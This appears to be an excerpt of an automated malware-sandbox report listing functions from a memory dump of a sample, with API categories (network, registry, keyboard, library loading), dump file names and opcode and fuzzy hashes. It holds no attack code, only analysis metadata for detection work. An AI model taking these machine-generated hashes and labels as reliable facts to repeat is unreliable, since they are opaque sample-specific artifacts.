                                                                          • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                          • Instruction Fuzzy Hash: 9F416322A1D64399EB20EB64D8441FDA765FF54788FC10031DA4D53AAAFF28D60BCB20
                                                                          Function 00007FF7ADC6DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 787153527-1403004172
                                                                          • Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                          • Instruction ID: d88bdf7972ce92d1e511e966d564b6d6117ca42b1cc01d263b23b6a66be61d17
                                                                          • Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                          • Instruction Fuzzy Hash: A031D922A0E6828AEB10FB11E4511B9E350FB85B80FC65231DA5D477A5EE3CE507C710
                                                                          Function 00007FF7ADC8D914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3113390036-3916222277
                                                                          • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                          • Instruction ID: 0d5e87ae36d63ee68b6ba01860d1200fd41f6a03b6765395ea80b5a698a5cd33
                                                                          • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                          • Instruction Fuzzy Hash: B431A522A1D6428DEB60AB11A410BAEA794FB84B81FE65131EA4D57B65EE3DD4038710
                                                                          Function 00007FF7ADC489B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6766d34bed599dda17ebb10c73db4c3446d583c55f8816c021d3ca08d462008
                                                                          • Instruction ID: c79c39efdf6504b4e852e19ca74bb5f07bda86f71cca297e34a2e92004ca8400
                                                                          • Opcode Fuzzy Hash: d6766d34bed599dda17ebb10c73db4c3446d583c55f8816c021d3ca08d462008
                                                                          • Instruction Fuzzy Hash: 06A1D7A2A0F7824DEF616A50940C3F9A692EF007A4FD64631DA7D067E5FF7CD6468320
                                                                          Function 00007FF7ADC945A4 Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLasthtonsinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 2227131780-0
                                                                          • Opcode ID: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                                          • Instruction ID: 7cda90ab7d732479271b99e3e72d117e4b6edc409419e3c359791613215a1aa8
                                                                          • Opcode Fuzzy Hash: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                                          • Instruction Fuzzy Hash: 2DA1E422A1E6428ADB10FB26D4502BEE791FF85B94FC24131EE4E477A5FE3CD5028764
                                                                          Function 00007FF7ADC9E838 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 3488606520-0
                                                                          • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                          • Instruction ID: c78b85225400efadc177b0ffbfa0f7448097eab036290290901395978e7a5a22
                                                                          • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                          • Instruction Fuzzy Hash: 1F81CF22B1E69189EB10EF2280546ADA7A5FB48FD4FC64035EE0D17BA6EF3CD402C750
                                                                          Function 00007FF7ADC3ED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                          • Instruction ID: fd038f754171681961eadfce59e3e56f4e17a01f1a03d3c9e08a61e8ba35bdfb
                                                                          • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                          • Instruction Fuzzy Hash: 4881B226A1E6528DF728BB6594402BDE6A5FB48B44FC24235DD0E176F5EEBCE403C720
                                                                          Function 00007FF7ADCA02DC Relevance: 7.7, APIs: 5, Instructions: 159registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                          • String ID:
                                                                          • API String ID: 3451389628-0
                                                                          • Opcode ID: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                                          • Instruction ID: fa0351f1071b18fc6c26b0f371f934dfe6a067785dab88d9f128dc484a2dfed5
                                                                          • Opcode Fuzzy Hash: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                                          • Instruction Fuzzy Hash: FD714F22B1DA469EEB10EFA5D0903BC7761FB84B88FC24531DA0D5766AEF38D106C764
                                                                          Function 00007FF7ADC3E67C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                          • String ID:
                                                                          • API String ID: 3659116390-0
                                                                          • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                          • Instruction ID: e8502a467150dffc4575a80d350f654cf9ff5dff31165ac3b74f76d37736189e
                                                                          • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                          • Instruction Fuzzy Hash: DE510236E19A518EE714DB65E4843ACB7B4FB48B88F858235CE1E077A8EF78D142C710
                                                                          Function 00007FF7ADCA0084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                          • String ID:
                                                                          • API String ID: 3740051246-0
                                                                          • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                          • Instruction ID: 9571b39c879dc50bdf6d4e5993386cf6f5ebcaae32876992030b5e813b547655
                                                                          • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                          • Instruction Fuzzy Hash: DA618E22A0DA4689EB10EBA5E4803BDB770FB84794FC24131DA4D4767AEF7CD546C760
                                                                          Function 00007FF7ADC9D0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D176
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D217
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D236
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D281
                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D2A0
                                                                            • Part of subcall function 00007FF7ADC24120: WideCharToMultiByte.KERNEL32 ref: 00007FF7ADC24160
                                                                            • Part of subcall function 00007FF7ADC24120: WideCharToMultiByte.KERNEL32 ref: 00007FF7ADC2419C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                          • String ID:
                                                                          • API String ID: 666041331-0
                                                                          • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                          • Instruction ID: 5a87ab650fc081a6364b71cb7e41c9809a825495231f08b24846a883b3dc6440
                                                                          • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                          • Instruction Fuzzy Hash: 2E512032A19B1689EB00EF65D8401ACB775FB58F94BD64432EE4E53365EF38D542C720
                                                                          Function 00007FF7ADC7670C Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                          • String ID:
                                                                          • API String ID: 4136290138-0
                                                                          • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                          • Instruction ID: f894a9e7b3d144bf69d96ff6473f0447843016652db6947c34905934a973b5ef
                                                                          • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                          • Instruction Fuzzy Hash: 65516733A2AB8596DB50DF15D4847AD73B4FB84B80F828222CB5D43764EF39E459CB10
                                                                          Function 00007FF7ADC42998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                          • Instruction ID: 0bd5aeaf53d894ddc372d634d25d98d5d47171ca08eb9c5a54830a66e18886e6
                                                                          • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                          • Instruction Fuzzy Hash: 1151916661E7828DE660AF119449179F696FF40BA0FE64231DE6A076E4FE7CE4428310
                                                                          Function 00007FF7ADC896A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                          • String ID:
                                                                          • API String ID: 2832842796-0
                                                                          • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                          • Instruction ID: 932c010040027ac38e8dab49f598aafe456d37158ac17d1e4d4e5ab7c2baaa3a
                                                                          • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                          • Instruction Fuzzy Hash: E0513C26A1DA4686DB50EF26E48056DB760FB88F94F859032EF8E47766EF3CD441C720
                                                                          Function 00007FF7ADC01CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                          • Instruction ID: 10aebc0270bc36a8135e1433af479e79fe3d4ab38e9238424ab9949ea519fdfc
                                                                          • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                          • Instruction Fuzzy Hash: 7451E136B0A6818FE754EF318444169F7A1FB45B98FC10231EA5A837E5EF38E4928710
                                                                          Function 00007FF7ADC3BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID:
                                                                          • API String ID: 190572456-0
                                                                          • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                          • Instruction ID: 32176ee65fad1ecd165b86adaa65e63f701ee09df1f9c9124e0c15c1101513ec
                                                                          • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                          • Instruction Fuzzy Hash: 7A41B761B1FA4689EA19AF059804276E392FF48B94FD74535DD1D8B3A5FE7CD4028320
                                                                          Function 00007FF7ADCAFF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable
                                                                          • String ID:
                                                                          • API String ID: 2939132127-0
                                                                          • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                          • Instruction ID: 8d8222ca04b8f4da5292f5943e41fc0a1f1209184de5015c7803c411cdec922f
                                                                          • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                          • Instruction Fuzzy Hash: 9351623290E78699EB619B15D4547B8B760EB89F84FDA8031DA4D073B0EE3DE443E320
                                                                          Function 00007FF7ADC6D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
